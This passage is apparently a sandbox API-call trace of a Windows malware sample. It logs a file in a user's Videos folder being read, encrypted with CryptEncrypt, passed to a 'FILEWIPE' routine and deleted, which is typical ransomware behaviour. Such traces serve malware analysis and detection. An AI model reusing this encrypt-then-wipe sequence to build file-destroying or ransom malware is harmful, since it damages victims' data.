RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0041.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0041.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0041.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0041.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0041.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0041.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0041.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0041.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0041.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0041.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0041.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0041.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0041.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0041.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0041.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0041.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0041.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0041.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0041.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0041.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0041.797] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0041.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0041.797] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da3f8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3f8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0041.797] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.797] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.797] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.797] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.797] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.797] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.797] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.797] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.797] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0041.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0041.797] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.798] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0041.798] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0041.798] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.798] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.798] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0041.798] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.798] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0041.798] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.798] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.798] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.798] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0041.798] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.799] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0041.799] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.800] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.800] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xb274, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xb280) returned 1 [0041.800] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.800] CharLowerBuffW (in: lpsz="byte[45697]", cchLength=0xb | out: lpsz="byte[45697]") returned 0xb [0041.802] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.802] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.803] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x935008*, pdwDataLen=0x6ae220*=0xb274, dwBufLen=0xb280 | out: pbData=0x935008*, pdwDataLen=0x6ae220*=0xb280) returned 1 [0041.805] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0041.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.805] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.805] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.813] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0041.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.813] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.813] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.813] CryptDestroyKey (hKey=0x7c2200) returned 1 [0041.813] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0041.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.813] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.813] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.813] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0041.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.814] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.814] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0041.814] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0041.814] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0041.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0041.814] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.814] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0041.814] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.814] FreeLibrary (hLibModule=0x754b0000) returned 1 [0041.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0041.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0041.816] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0041.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0041.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.816] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2TVP.avi", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfad128a0, ftCreationTime.dwHighDateTime=0x1d5b6cd, ftLastAccessTime.dwLowDateTime=0x78383e60, ftLastAccessTime.dwHighDateTime=0x1d5bd21, ftLastWriteTime.dwLowDateTime=0x78383e60, ftLastWriteTime.dwHighDateTime=0x1d5bd21, nFileSizeHigh=0x0, nFileSizeLow=0xb274, dwReserved0=0x0, dwReserved1=0x777648, cFileName="2TVP.avi", cAlternateFileName="")) returned 0x7c2240 [0041.816] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0041.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0041.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0041.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.816] CharLowerBuffW (in: lpsz="byte[45684]", cchLength=0xb | out: lpsz="byte[45684]") returned 0xb [0041.816] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0041.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0041.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.817] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0041.817] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0041.817] FreeLibrary (hLibModule=0x76b40000) returned 1 [0041.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0041.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0041.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0041.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0041.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0041.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0041.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0041.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0041.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0041.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0041.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0041.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0041.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0041.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0041.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0041.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0041.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0041.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0041.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0041.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0041.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0041.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0041.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0041.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0041.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.818] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0041.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0041.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.818] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0041.818] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.819] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2TVP.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2tvp.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0041.819] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0041.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0041.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0041.819] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0041.819] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.819] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.819] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.820] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0041.820] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.820] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.820] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.820] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2TVP.avi", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2TVP.avi", lpFilePart=0x0) returned 0x2d [0041.820] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2TVP.avi", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfad128a0, ftCreationTime.dwHighDateTime=0x1d5b6cd, ftLastAccessTime.dwLowDateTime=0x78383e60, ftLastAccessTime.dwHighDateTime=0x1d5bd21, ftLastWriteTime.dwLowDateTime=0x18a2cae0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xb274, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="2TVP.avi", cAlternateFileName="")) returned 0x7c2240 [0041.820] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2TVP.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2tvp.avi")) returned 1 [0041.821] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfad128a0, ftCreationTime.dwHighDateTime=0x1d5b6cd, ftLastAccessTime.dwLowDateTime=0x78383e60, ftLastAccessTime.dwHighDateTime=0x1d5bd21, ftLastWriteTime.dwLowDateTime=0x18a2cae0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xb274, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="2TVP.avi", cAlternateFileName="")) returned 0 [0041.821] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0041.822] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.823] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0041.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0041.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0041.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 